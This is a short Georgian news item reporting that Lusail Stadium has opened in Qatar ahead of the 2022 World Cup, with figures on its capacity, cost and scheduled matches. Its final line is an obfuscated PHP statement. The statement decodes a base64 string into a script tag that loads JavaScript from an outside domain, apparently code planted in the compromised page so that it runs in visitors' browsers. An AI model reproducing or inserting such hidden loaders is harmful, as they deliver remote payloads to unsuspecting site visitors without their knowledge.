celsiusi
ავერსი საქკაბელი
ყატარში ოფიციალურად გახსნეს ბოლო სტადიონი, რომელზეც მსოფლიოს 2022 წლის ჩემპიონატის მატჩები გაიმართება.
 
ლაპარაკია ქალაქ ლუსაილის ამავე სახელწოდების სტადიონზე, რომელიც დოჰადან ჩრდილოეთით 20 კილომეტრში მდებარეობს.
 
ოქროს სტადიონი „ლუსაილი“, რომელიც დაპროექტებულია ნორმან ფოსტერის არქიტექტურული ბიუროს მიერ, მსოფლიოს მომავალი ჩემპიონატის ყველაზე ტევადი არენაა – მას შეუძლია მიიღოს 80 ათასი მაყურებელი. ორგანიზატორების ინფორმაციით, ამ სტადიონზე გასამართი მატჩების ყველა ბილეთი გაყიდულია.
 
ლუსაილი – სუპერთანამედროვე ქალაქია, რომელიც სპეციალურად მსოფლიოს ჩემპიონატისთვის ააშენეს. სტადიონი „ლუსაილი“ ტურნირის 10 მატჩს უმასპინძლებს, მათ შორის, ერთ ნახევარფინალსა და ფინალს. მის მშენებლობაზე 700 მილიონი ევრო დაიხარჯა.
 
ყატარში მსოფლიოს ჩემპიონატი 20 ნოემბრიდან 18 დეკემბრამდე გაიმართება.
518
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");